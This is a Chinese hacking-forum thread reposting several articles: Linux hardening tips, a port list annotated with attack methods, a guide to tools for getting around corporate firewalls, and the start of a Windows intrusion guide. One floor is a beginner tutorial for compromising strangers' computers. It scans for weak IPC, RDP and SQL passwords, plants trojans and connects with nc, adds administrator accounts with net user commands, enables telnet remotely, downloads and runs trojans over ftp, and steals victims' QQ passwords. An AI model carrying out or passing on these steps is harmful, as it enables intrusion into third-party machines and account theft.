每个帐号ID应该有专人负责。在企业中,如果负责某个ID的职员离职,管理员应立即从系统中删除该帐号。很多入侵事件都是借用了那些很久不用的帐号。
在用户帐号之中,黑客最喜欢具有root权限的帐号,这种超级用户有权修改或删除各种系统设置,可以在系统中畅行无阻。因此,在给任何帐号赋予root权限之前,都必须仔细考虑。
Linux系统中的/etc/securetty文件包含了一组能够以root帐号登录的终端机名称。例如,在RedHatLinux系统中,该文件的初始值仅允许本地虚拟控制台(rtys)以root权限登录,而不允许远程用户以root权限登录。最好不要修改该档,如果一定要从远程登录为root权限,最好是先以普通帐号登录,然后利用su命令升级为超级用户。

第6招:消除黑客犯罪的温床
在Unix系统中,有一系列r字头的公用程序,它们是黑客用以入侵的武器,非常危险,因此绝对不要将root帐号开放给这些公用程序。由于这些公用程序都是用.rhosts�n或者hosts.equiv档核准进入的,因此一定要确保root帐号不包括在这些档之内。
由于r字头指令是黑客们的温床,因此很多安全工具都是针对这一安全漏洞而设计的。例如,PAM工具就可以用来将r字头公用程序的功力废掉,它在/etc/pam.d/rlogin文件中加上登录必须先核准的指令,使整个系统的用户都不能使用自己home目录下的.rhosts文件。

第7招:增强安全防护工具
SSH是安全套接层的简称,它是可以安全地用来取代rlogin、rsh和rcp等公用程序的一套程序组。SSH采用公开密钥技术对网络上两台主机之间的通信信息加密,并且用其密钥充当身份验证的工具。
由于SSH将网络上的信息加密,因此它可以用来安全地登录到远程主机上,并且在两台主机之间安全地传送信息。实际上,SSH不仅可以保障Linux主机之间的安全通信,Windows用户也可以通过SSH安全地连接到Linux服务器上。

第8招:限制超级用户的权力
我们在前面提到,root是Linux保护的重点,由于它权力无限,因此最好不要轻易将超级用户授权出去。但是,有些程序的安装和维护工作必须要求有超级用户的权限,在这种情况下,可以利用其它工具让这类用户有部分超级用户的权限。Sudo就是这样的工具。
Sudo程序允许一般用户经过组态设定后,以用户自己的密码再登录一次,取得超级用户的权限,但只能执行有限的几个指令。例如,应用sudo后,可以让管理磁带备份的管理人员每天按时登录到系统中,取得超级用户权限去执行文文件备份工作,但却没有特权去作其它只有超级用户才能作的工作。
Sudo不但限制了用户的权限,而且还将每次使用sudo所执行的指令记录下来,不管该指令的执行是成功还是失败。在大型企业中,有时候有许多人同时管理Linux系统的各个不同部分,每个管理人员都有用sudo授权给某些用户超级用户权限的能力,从sudo的日志中,可以追踪到谁做了什么以及改动了系统的哪些部分。
值得注意的是,sudo并不能限制所有的用户行为,尤其是当某些简单的指令没有设置限定时,就有可能被黑客滥用。例如,一般用来显示文件内容的/etc/cat指令,如果有了超级用户的权限,黑客就可以用它修改或删除一些重要的档。

第9招:追踪黑客的踪迹
当你仔细设定了各种与Linux相关的组态,并且安装了必要的安全防护工具之后,Linux操作系统的安全性的确大为提高,但是却并不能保证防止那些艺高人胆大的网络黑客的入侵。
在平时,网络管理人员要经常提高警惕,随时注意各种可疑状况,并且按时检查各种系统日志文件,包括一般信息日志、网络连接日志、文件传输日志以及用户登录日志等。在检查这些日志时,要注意是否有不合常理的时间记载。例如:
&#8226;正常用户在半夜三更登录;
&#8226;不正常的日志记录,比如日志只记录了一半就切断了,或者整个日志文件被删除了;
&#8226;用户从陌生的网址进入系统;
&#8226;因密码错误或用户帐号错误被摈弃在外的日志记录,尤其是那些一再连续尝试进入失败,但却有一定模式的试错法;
&#8226;非法使用或不正当使用超级用户权限su的指令;
&#8226;重新开机或重新激活各项服务的记录。

第10招:共同防御,确保安全
从计算机安全的角度看,世界上没有绝对密不透风、百分之百安全的计算机系统,Linux系统也不例外。采用以上的安全守则,虽然可以使Linux系统的安全性大大提高,使顺手牵羊型的黑客和计算机玩家不能轻易闯入,但却不一定能阻挡那些身怀绝技的武林高手,因此,企业用户还需要借助防火墙等其它安全工具,共同防御黑客入侵,才能确保系统万无一失。


B29层 发表时间: 11/10 20:33

回复: mingming8 [mingming8]   论坛用户   登录
菜鸟常用攻击另类详细教程
--------------------------------------------------------------------------------
作者:未知 来源:未知 日期:2002-12-08 点击:4212

--------------------------------------------------------------------------------

看到论坛里有部分会员问的都是一些怎样入侵对方电脑的问题。想了许久,我决定自己提笔写一篇文章,总结我几个月来接触这个领域的一点经验,希望能对跟我一样菜的菜鸟们点帮助。这也是我第一次写文章,有些地方难免会出现错误,如有不明地方可以提出来。
  好~~!废话就不多说了,开始步入正题吧!!开始之前先请各位统装98的改装NT以上系统,因为下面用到的一些命令和软件
在98下是行不通的。通常得到管理员权限才能说入侵控制了对方计算机,所以下面的入侵方法都能得到管理员权限。说句题外话,我用的是win2000,所以操作都是在这个系统通过的。

  1. 不用说,肯定是IPC弱口令啦,真不明白网上为什么会有那么多这种人见人爱车见车载的计算机,随便一扫都能扫出一大堆。首先,打开流光4.7,记得要打IP补丁啊,不然不能扫国内的主机,这样是很不爽的,要来个通杀嘛,呵呵。点击“探测-高级扫描工具”,出现一个方框,输入一段IP,检测项目中只需在IPC前面打钩。点“确定-开始”就开始探测了。如果你的IP段够好的话,很快就可以在最下面的方框里看到结果。哈哈~~真是多啊,基本上都是空口令。好,现在就开始入侵了,点击“工具-NT/IIS工具-种植者”,填入刚才扫描得到的结果,选一个应用程序文件,我常用的是独孤剑客的winshell(下面提到的都是默认设置),5K大小,是我56K猫的最爱~!你也可以上传灰鸽子,这种木马挺不错的,能自动解析域名上线,还可以避过防火墙。一分钟后,我传上去的winshell运行了,很自然的打开cmd.exe,打上nc IP 5277 提示输入密码,输入设置winshell时的密码(默认为空),回车就进入对方电脑了。这时出现cmd>提示符,输入i(安装winshell)再输入s(进入cmd),再再输入“net start winshell”(后台服务,开机自动运行)。完成前面的步骤后,才算是真正进去了。进去干嘛呢?嗯~~这确实是个很高深的问题~~%¥想干什么就给你们去想吧。不过,呵呵,我还是想说几句,推荐找到他的tencent目录,找到他的QQ号码,加他为好友,方便以后长期控制他(肉机啊)。如果他不肯通过你的请求,那就用狠一点的手段,利用流光种植者再上传一个QQ杀手,把他的QQ密码偷到手。得到他的密码之后就~~~~~就用他的QQ登陆,再用自己的私人QQ提交好友请求。爽吧~~~~加多一句废话,如果他还没申请密码保护,那就好心点,帮他申请啦,不过邮箱记得要用自己的啊!!!

  2. 3389。请各位注意,我这里并不是说什么烂鬼输入法漏洞。这种漏洞差不多已经绝迹了,太难找了,如果有人找到了,那恭喜你啦,证明你今天时运高,记得要买彩票啊!众所周知,有开3389的一般都是服务器,也就是说有很大可能带局域网的,而内部入侵比外部要方便一点。如何能快速方便的得到开了终端的肉机呢?这需要用到两个工具,都是扫描工具来的,scanner3.0和焦点的xscan。打开scanner,输入一段IP,范围要大一点,scanner速度很快的。在“所有端口从”那里都填3389,点击“开始”就可以开工了。跟QQ上的好友聊了几句之后,铛~~~扫描完成,结果出来了。点击右下脚的“删除”把多余的IP删了,只留下开了3389的IP。再点击“保存”,把结果保存到文件夹里。找到保存文件的目录,打开它。用记事本的替换功能把它保存为一个纯IP的TXT文件。“编辑-替换”在“查找内容”里输入要删除的垃圾,再点“全部替换”就行了。打开xscan,点击左边的蓝色按钮,进入“扫描板块”,只需在“SQL-Server弱口令”“NT-Server弱口令”前打钩,其他都清除掉。再点击右边的蓝色按钮,进入“扫描参数”,钩上“从文件获取主机列表”,打开刚才替换成纯IP的TXT文件,确定之后就可以扫描了。这时需要比较长的时间!去论坛灌灌水,跟MM说几句话吧,不要傻等就行了。确定目标,用mstsc(登陆终端的工具)登陆对方主机后,打开对方cmd.exe,输入“net use”,先看看有没有人也在连接这部机(安全一点好,^_^)。“net view”命令之后当出现一堆前面带\\字符的就表示~~就表示什么呢??我想大家都非常明白吧! 这时你就可以在那部计算机里下载并装个像“网络执行官”之类的局域网控制软件。碰到这样的计算机一定要珍惜啊,要充分利用利用。

  3.sa空口令。这时又要用到流光了,点击“探测-扫描POP3/FTP/NT/SQL主机”,扫描主机类型设为SQL,把“将FrontPage主机自动加入HTTP列表”去掉。扫描结果出来了之后,用鼠标左键单击某一个结果,点两下“连接”就会出现一个方框,“Type Command at Prompt”提示符是SQLCMD>。打入一个命令“net user 要创建的用户名 密码 /add”(这是创建一个用户),再打一个“net localgroup administrators 刚创建的用户名 /add”(把创建的用户加到administrators组)。创建了用户当然是用流光种植者上传后门啦,填入资料,点确定,但却提示上传文件失败,再检查一下IP,用户名,密码,并没有错啊。咚咚~~~告诉你们吧,这是因为对方删除了IPC$,种植者需要IPC连接,你当然上传不了文件啦。这时候就要动用另一种工具,它的特点是:不依赖于目标的ipc$开放与否远程开启/关闭目标telnet服务,这就是“rtcs.vbs”。在cmd输入:“cscript RTCS.vbs 目标IP 用户名 密码 NTLM验证方式 telnet服务端口”,当出现“to get a shelll”时就表示成功了,你就可以“telnet IP 服务端口”了,简单吧!!如果你想上传木马,也很简单,只要登陆ftp服务器(要有你要下载的木马服务端)。这些可以找网上的肉机,弱密码的实在太多了,或用自己部机做服务器也可以,后面我会详细介绍。telnet上对方,输入“ftp ftp服务器IP”用户名密码进入,“get 木马服务端”就下载来了。“bye”退出ftp,输入木马文件名回车就运行了,以后你就可以用木马控制他了。

  4.U漏洞。这种漏洞现在虽然很少,但还是可以比较轻松的扫描到,用这种方法黑网站确实很轻松。但我们这次说的并不是如何黑网站,而是如何取得管理员权限。首先,启动流光,选择“探测--扫描POP3/FTP/NT/SQL主机”,“扫描主机类型”为NT/98。等一段时间(看你扫描IP多少来看)扫描完成后。如果你能在中间的方框里看到黑色的小电脑,就说明你已经得到了存在U漏洞的主机了。双击iiscrk(小金的作品),在“当前连接”处添上刚才扫描得到的主机,其他设置一般默认行了,不行,换其他方式试试。点击左边第一个图标连接IIS主机,如果成功,你就会在最下边的方框看到对方主机目录。要当心啊,具有删读的权限,不要乱破坏(警告)。好,现在开始真正工作了。单击左数第六个图标“tftp”,如何做我就不多说了,里面说得明明白白。不过,要上传什么文件我还是要说的,这个就是iiscrk自带的idq.dll,把它上传到cripts目录,成功后。在cmd输入“ispc 对方IP/scripts/idq.dll ”(ISPC每次执行一个命令要打3次回车)。成功登陆到对方后,你就有了system权限。用我上面提到的方法创建用户并加他到administrators组。我要补充的是,一般你连接上去时出现的目录都是可执行目录,文件可放在里面。

  本来我打算写多几种方法的,但没有什么时间,现在我连打开电脑的时间都受到了限制(痛苦ing)。因为这次期中考考得实在是#¥#!!唉~~~,有一科还是老师好心,送我几分我才及格(太惭愧了)。看来要以后啦。。

  上面提到的软件如果本站没有下载,请www.google.com搜索。

  推荐几个不错的东东,适合菜鸟(我也经常用):
DameWare Mini Remote Control(远程桌面控制)
Loader(我主要是用它来改QQ端口,因为我经常用代理啊)
BlackICE PC Protection(防火墙)
MsgSend(发信息用)
QQ代理(不用我说,你们肯定知道是干嘛的)
ttyip(隐藏自己在论坛、留言本、计数器、WEB聊天室、网页的真实IP)


B30层 发表时间: 11/10 20:34

回复: mingming8 [mingming8]   论坛用户   登录
常见端口详解及部分攻击策略
--------------------------------------------------------------------------------
作者:未知 来源:未知 日期:2003-02-07 点击:392

--------------------------------------------------------------------------------

常见端口详解及部分攻击策略

1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,

缺省情况下tcpmux在这种系统中被打开。
Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp,

demos, tutor, diag, EZsetup, OutOfBox,
和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上

搜索tcpmux并利用这些帐户。

7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255

的信息。

常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到

另一个机器的UDP数据包,而两个机器分别以
它们最快的方式回应这些数据包。(参见Chargen)

另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫

做“Resonate Global Dispatch”,它与DNS的这一端
口连接以确定最近的路由。

Harvest/squid cache将从3130端口发送UDP echo:“如果

将cache的source_ping on选项打开,它将对原始主机的UDP echo
端口回应一个HIT reply。”这将会产生许多这类数据包。

11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什

么启动了这些进程。这为入侵者提供了许多信
息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统

中“ps”命令的结果相似

再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11

19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含

有垃圾字符的包。TCP连接时,会发送含有垃
圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个

chargen服务器之间的UDP包。由于服务器企
图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器

过载。同样fraggle DoS攻击向目标地址的这
个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载



21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些

服务器带有可读写的目录。Hackers或Crackers
利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索

引擎分类)的节点。

22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有

许多弱点。如果配置成特定的模式,许多使用
RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)

还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫

描整个域的ssh主机。你有时会被使用这一程
序的人无意中扫描到。

UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描

。5632(十六进制的0x1600)位交换后是0x0016
(使进制的22)。

23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一

端口是为了找到机器运行的操作系统。此外使
用其它技术,入侵者会找到密码。

25 smtp 攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的

帐户总被关闭,他们需要拨号连接到高带宽
的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其

是sendmail)是进入系统的最常用方法之一,因为
它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)

或隐藏其它通讯。因此防火墙常常过滤或记录
53端口。

需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种

通讯并假设这是对DNS查询的回复。Hacker常
使用这种方法穿透防火墙。

67和68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常

会看见大量发送到广播地址255.255.255.255的
数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一

个地址把自己作为局部路由器而发起大量的
“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置

,服务器向67端口(bootpc)广播回应请求。
这种回应使用广播是因为客户端还不知道可以发送的IP地址。

69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启

动代码。但是它们常常错误配置而从系统
提供任何文件,如密码文件。它们也可用于向系统写入文件。

79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出

错误,回应从自己机器到其它机器finger扫描。

98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器

在98端口提供基于Web界面的服务。它已发现有
许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可

访问的文件,LANG环境变量有缓冲区溢出。此
外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历

遍目录等)

109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)

。在同一个服务器上POP3的漏洞在POP2中同样
存在。

110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。

关于用户名和密码交换缓冲区溢出的弱点至少
有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它

缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper

是扫描系统查看允许哪些RPC服务的最早的一步。
常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等

。入侵者发现了允许的RPC服务将转向提供服务
的特定端口测试漏洞。

记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用

什么程序访问以便发现到底发生了什么。

113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。

使用标准的这种服务可以获得许多机器的信息
(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP,

IMAP, SMTP和IRC等服务。通常如果有许多客户通
过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你

阻断这个端口客户端会感觉到在防火墙另一边与
e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,

着将回停止这一缓慢的连接。

119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸

如:news://comp.security.firewalls/. 的地址
时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。

多数ISP限制只有他们的客户才能访问他们的新闻
组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组

服务器,匿名发帖或发送spam。

135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC

end-point mapper为它的DCOM服务。这与UNIX 111
端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper

注册它们的位置。远端客户连接到机器时,它们查
询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了

找到诸如:这个机器上运行Exchange Server吗?
是什么版本?

这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一

些DoS攻击直接针对这个端口。

137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息,

请仔细阅读文章后面的NetBIOS一节

139 NetBIOS
File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务

。这个协议被用于Windows“文件和打印机共享”
和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。

大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5

VisualBasic Scripting)开始将它们自己拷贝到
这个端口,试图在这个端口繁殖。

143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行

登陆过程中进入。记住:一种Linux蠕虫(admw0rm)
会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户

。当RadHat在他们的Linux发布版本中默认允许IMAP
后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。

这一端口还被用于IMAP2,但并不流行。

已有一些报道发现有些0到143端口的攻击源于脚本。

161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和

运行信息都储存在数据库中,通过SNMP客获得
这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用

缺省的密码“public”“private”访问系统。他
们可能会试验所有可能的组合。

SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP

JetDirect remote management软件使用SNMP。
HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看

见这种包在子网内广播(cable modem, DSL)
查询sysName和其它信息。

162 SNMP trap 可能是由于错误配置

177 xdmcp 许多Hacker通过它访问X-Windows控制台, 它同时需要打开6000端

口。

513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广

播。这些人为Hacker进入他们的系统提供了很
有趣的信息。

553 CORBA
IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播

。CORBA是一种面向对象的RPC(remote procedure
call)系统。Hacker会利用这些信息进入系统。

600 Pcserver backdoor 请查看1524端口

一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻

破了系统-- Alan J. Rosenthal.

635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这

个端口的扫描是基于UDP的,但基于TCP的
mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何

端口(到底在哪个端口,需要在端口111做
portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。

1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎

用哪个端口连接网络,它们请求操作系统为
它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着第

一个向系统请求分配动态端口的程序将被分配
端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口

运行“natstat -a”,你将会看到Telnet被分
配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐

变大。再来一遍,当你浏览Web页时用“netstat”
查看,每个Web页需要一个新端口。

1025 参见1024

1026 参见1024

1080 SOCKS
这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址

访问Internet。理论上它应该只允许内部的
通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的

位于防火墙外部的攻击穿过防火墙。或者简
单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。WinGate

是一种常见的Windows个人防火墙,常会发
生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

1114 SQL
系统本身很少扫描这个端口,但常常是sscan脚本的一部分。

1243 Sub-7木马(TCP)
参见Subseven部分。

1524 ingreslock后门
许多攻击脚本将安装一个后门Shell于这个端口(尤其是那些针对Sun系统

中Sendmail和RPC服务漏洞的脚本,如statd,
ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的

连接企图,很可能是上述原因。你可以试试
Telnet到你的机器上的这个端口,看看它是否会给你一个Shell。连接

到600/pcserver也存在这个问题。

2049 NFS
NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪

个端口,但是大部分情况是安装后NFS运行于
这个端口,Hacker/Cracker因而可以闭开portmapper直接测试这个端口。

3128 squid
这是Squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一

个代理服务器而匿名访问Internet。你也会看
到搜索其它代理服务器的端口:8000/8001/8080/8888。扫描这一端口的另一

原因是:用户正在进入聊天室。其它用户
(或服务器本身)也会检验这个端口以确定用户的机器是否支持代理。请查

看5.3节。

5632 pcAnywere
你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打

开pcAnywere时,它会自动扫描局域网C类网以寻找可能
得代理(译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种

服务的机器,所以应该查看这种扫描的源地址。
一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。

6776 Sub-7 artifact
这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者

通过电话线控制另一台机器,而被控机器挂断
时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的

,在这个端口的连接企图。(译者:即看到
防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)

6970 RealAudio
RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是

由TCP7070端口外向控制连接设置的。

13223 PowWow
PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连

接。这一程序对于建立连接非常具有“进攻性”。
它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如

果你是一个拨号用户,从另一个聊天者手中
“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。

这一协议使用“OPNG”作为其连接企图的前四
个字节。

17027 Conducent
这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot"

的共享软件。Conducent "adbot"是为共享软件
显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻

断这一外向连接不会有任何问题,但是封掉IP
地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:机器

会不断试图解析DNS名―ads.conducent.com,
即IP地址216.33.210.40 ;216.33.199.77 ;216.33.199.80

;216.33.199.81;216.33.210.41。(译者:不知NetAnts使
用的Radiate是否也有这种现象)

27374 Sub-7木马(TCP)
参见Subseven部分。

30100 NetSphere木马(TCP)
通常这一端口的扫描是为了寻找中了NetSphere木马。

31337 Back Orifice “elite”
Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精

华。即3=E, 1=L, 7=T)。因此许多后门程序运
行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这

是Internet上最常见的扫描。现在它的流行越来越少,
其它的木马程序越来越流行。

31789 Hack-a-tack
这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT, Remote

Access Trojan)。这种木马包含内置的31790
端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵

。(31789端口是控制连接,317890端口是文
件传输连接)

32770~32900 RPC服务
Sun Solaris的RPC服务在这一范围内。详细的说:早期版本

的Solaris(2.5.1之前)将portmapper置于这一范围内,即使
低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围

内的端口不是为了寻找portmapper,就是为了
寻找可被攻击的已知的RPC服务。

33434~33600 traceroute
如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于

traceroute。参见traceroute部分。

41508 Inoculan
早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。


B31层 发表时间: 11/10 20:36

回复: mingming8 [mingming8]   论坛用户   登录
超越主机限制七绝技 www.030405.com  2002-12-25  詹氏电脑


   大多数的企业为了安全原因,在网络中设置有防火墙,这样既可以防止非法用户访问公司局域网内的电脑,同时也可使内部员工访问Internet,管理员一般会设置只允许一定的应用程序穿越防火墙,而常常将例如:ICQ、POP3信件收取、PCAnywhere之类的软件限制掉。

  我找到了几个可以突破网关限制的软件,下面就请大家一起来看看吧。
绝技1 ICQProxy 

  ICQProxy是一个可令ICQ冲破HTTP代理服务器限制的软件,它的工作原理是在你的系统中模拟ICQ服务器,将原来ICQ使用的端口4000改用为端口80,这样ICQ所发送的数据首先送到ICQProxy客户端,再由它通过HTTP代理服务器传送到该软件公司免费的HTTP-Tunnel服务器,接着由该服务器将数据送至真正的ICQ服务器,正是依据这种转发机理,使用户可以正常使用ICQ与朋友们聊天。

  提示与技巧:如果你的公司或单位只允许员工浏览网页,可你又想与朋友进行即时聊天,其实不用其他软件便可实现这一愿望,那就是使用微软的MSNMessenger。

绝技2 HTTP-Tunnel

  HTTP-Tunnel与ICQProxy同出自一家软件公司,与ICQProxy的原理一样,但它的功能更为强大,可支持任何支持Socks5协议的网络应用程序,用户可利用它来使用ICQ、Oicq、AIM、Yahoo
Messenger、Napster等软件。另外,如果你使用的是ICQ99b,或是遇到ICQ2000无法使用的情况,可选择ICQProxy。

绝技3 SocksCap32 

  SocksCap32是由著名的NEC公司开发的透明代理软件(该公司在Socks5的开发上做了大量工作)。它可以使那些基于Windows的通过TCP或者UDP协议通讯的客户端软件自动穿越Socks代理服务器,让几乎所有基于TCP/IP协议的软件(如各种浏览器、下载工具、FTP上传软件等)都能使用Socks代理出国。

  你甚至可以用它与其他网络软件结合,通过两次代理访问被屏蔽掉的网站。

绝技4 HTTPPort

  现在许多单位不但架设代理服务器,还禁掉了80以外的所有端口,员工们只能进行浏览网页的操作,而FTP、IRC、即时聊天等网络功能则根本无法使用。

  HTTPort就是什么这种情况而设计的,它能够以HTTP协议通过内部代理服务器连接到外面的公用Proxy,然后将内容传回来,从而骗过内部Proxy,冲破限制,让用户可以使用其他网络服务,比如:FTP、POP3等。

  但令人遗憾的是,该软件不支持UDP,所以ICQ、OICQ也就无法通过它使用了。

绝技5 Socks2HTTP

  Socks2HTTP可以将SOCKS5请求转换成HTTP请求,使其能够穿越HTTP代理服务器。由于SOCKS协议允许程序穿过任何端口的防火墙,所以许多软件都选择使用该协议,如:Napster、Gnutella、CRT等。

  Socks2HTTP为这些SOCKS客户程序模拟了一个轻巧的SOCKS服务器,使它们可以冲破HTTP代理服务器的限制(支持HTTPPOST模式、可以穿越几乎所有HTTP代理服务器/防火墙),执行相应连接。
该软件的工作原理为:先将Socks请求转换为HTTP请求,然后通过HTTP代理服务器连接到软件的公司主页,接着由它转化成Socks并发送出去。

  如果你的公司或单位只允许员工浏览网页,并关掉了80之外的端口,那么SocksHTTP可以解决你的烦恼,用上自己心爱的网络软件,比如上面提到的软件。当然用它也可以上OICQ,不过据说效果不是太好,速度相当慢。

  Socks2HTTP也可以在不支持SOCKS的TCP/IP客户端程序中使用,包括Telnet和FTP。另外,如果与下面介绍的SocksCap32配合,效果将会更佳,像以前不能用的FTP、E-Mail、Telnet以及即时聊天等软件都可再获新生。

绝技6 e-BorderClient

  我上面曾提到过NEC公司在Socks5的开发上作了大量工作,而e-Border则是该公司推出的最为完整的Socks解决方案。e-BorderClient是相应的客户端软件,它不仅能够连接到NEC专门的e-Border服务器,还可连接普通Socks5代理服务器。提供强大的Socks5代理调度,还能截取你系统里的所有连接请求,将它们通过代理连接出去。

  另外,该软件还可以代理诸如:DiabloII、星际争霸的战网连接和石器时代、万王之王等网络游戏的服务器登录。如果你使用的是局域网或是169而想玩在线游戏,在SocksCap32无能为力时,用它试试,可能会有意外之喜。

  相比我们以前曾经介绍过的软件,e-BorderClient的最大特点是,自动截取所有连接请求,这样网络软件无需另行配置就可以通过它连接出去,非常方便。

  不过,我们在试用中也发现,当使用软件的探测功能查找e-Border服务器时,却被告知结果为0,这样用户就必须先在网上找到可用的Socks5代理服务器才行,而且这方面的资源相对较少。最后就是,由于该软件对系统进行了深层设置,所以可能会影响某些软件的正常使用。

绝技7 FileGateway

  Gateway FileGateway能够让你通过HTTP代理服务器/防火墙上传文件。该软件是一个既是客户端程序,又是服务器端程序的FTP类型的系统,能够让你通过HTTP协议传输文件。

  它实际上可以访问并穿越所有类型的代理服务器/防火墙,甚至那些没有提供SOCK支持的也不在话下。


B32层 发表时间: 11/10 20:37

回复: mingming8 [mingming8]   论坛用户   登录
闯网者经验总结
--------------------------------------------------------------------------------
作者:未知 来源:未知 日期:2003-02-07 点击:338

--------------------------------------------------------------------------------

我下面给一些菜鸟讲解一下如何入侵现在的网络,主要针对win2000操作系统。继微软打了sp3的补丁以后,可以说挡住了很多利用以前旧漏洞入侵他人计算机的菜鸟,像什么输入法漏洞,针对iis的idq,ida溢出漏洞等,这些可能大家太熟悉不过了。可是现在很难找到这样的主机。我们还有其他的办法吗?当然有了,我给大家介绍几个方法。其中很多涉及工具的使用,要认真看哦。
注意,我们的入侵平台也必须是win2000专业或服务器版。
